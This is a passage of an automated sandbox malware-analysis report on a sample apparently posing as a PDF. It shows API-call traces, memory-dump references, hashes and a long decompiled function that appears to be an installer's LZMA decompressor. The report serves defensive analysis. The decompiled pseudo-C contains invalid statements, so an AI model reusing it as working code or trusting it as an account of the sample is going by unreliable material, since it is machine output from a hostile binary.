                                                                                            • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsn33EB.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsn33EB.tmp\*.*,?,?,746AFAA0,746AF560,00000000), ref: 00405E1E
                                                                                            • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
                                                                                            • FindClose.KERNELBASE(00000000), ref: 00405ECD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                            • String ID: .$.$C:\Users\user\AppData\Local\Temp\nsn33EB.tmp\*.*$\*.*
                                                                                            • API String ID: 2035342205-2754013311
                                                                                            • Opcode ID: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                                                                                            • Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
                                                                                            • Opcode Fuzzy Hash: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                                                                                            • Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00406D5F Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 630 406d5f-406d64 631 406dd5-406df3 630->631 632 406d66-406d95 630->632 633 4073cb-4073e0 631->633 634 406d97-406d9a 632->634 635 406d9c-406da0 632->635 636 4073e2-4073f8 633->636 637 4073fa-407410 633->637 638 406dac-406daf 634->638 639 406da2-406da6 635->639 640 406da8 635->640 641 407413-40741a 636->641 637->641 642 406db1-406dba 638->642 643 406dcd-406dd0 638->643 639->638 640->638 647 407441-40744d 641->647 648 40741c-407420 641->648 644 406dbc 642->644 645 406dbf-406dcb 642->645 646 406fa2-406fc0 643->646 644->645 649 406e35-406e63 645->649 653 406fc2-406fd6 646->653 654 406fd8-406fea 646->654 656 406be3-406bec 647->656 650 407426-40743e 648->650 651 4075cf-4075d9 648->651 657 406e65-406e7d 649->657 658 406e7f-406e99 649->658 650->647 655 4075e5-4075f8 651->655 659 406fed-406ff7 653->659 654->659 663 4075fd-407601 655->663 660 406bf2 656->660 661 4075fa 656->661 662 406e9c-406ea6 657->662 658->662 664 406ff9 659->664 665 406f9a-406fa0 659->665 667 406bf9-406bfd 660->667 668 406d39-406d5a 660->668 669 406c9e-406ca2 660->669 670 406d0e-406d12 660->670 661->663 672 406eac 662->672 673 406e1d-406e23 662->673 681 407581-40758b 664->681 682 406f7f-406f97 664->682 665->646 671 406f3e-406f48 665->671 667->655 674 406c03-406c10 667->674 668->633 683 406ca8-406cc1 669->683 684 40754e-407558 669->684 675 406d18-406d2c 670->675 676 40755d-407567 670->676 677 40758d-407597 671->677 678 406f4e-407117 671->678 689 406e02-406e1a 672->689 690 407569-407573 672->690 679 406ed6-406edc 673->679 680 406e29-406e2f 673->680 674->661 688 406c16-406c5c 674->688 691 406d2f-406d37 675->691 676->655 677->655 678->656 686 406f3a 679->686 687 406ede-406efc 679->687 680->649 680->686 681->655 682->665 693 406cc4-406cc8 683->693 684->655 686->671 694 406f14-406f26 687->694 695 406efe-406f12 687->695 696 406c84-406c86 688->696 697 406c5e-406c62 688->697 689->673 690->655 691->668 691->670 693->669 698 406cca-406cd0 693->698 701 406f29-406f33 694->701 695->701 704 406c94-406c9c 696->704 705 406c88-406c92 696->705 702 406c64-406c67 GlobalFree 697->702 703 406c6d-406c7b GlobalAlloc 697->703 699 406cd2-406cd9 698->699 700 406cfa-406d0c 698->700 706 406ce4-406cf4 GlobalAlloc 699->706 707 406cdb-406cde GlobalFree 699->707 700->691 701->679 708 406f35 701->708 702->703 703->661 709 406c81 703->709 704->693 705->704 705->705 706->661 706->700 707->706 711 407575-40757f 708->711 712 406ebb-406ed3 708->712 709->696 711->655 712->679
                                                                                            C-Code - Quality: 98%
                                                                                            			E00406D5F() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
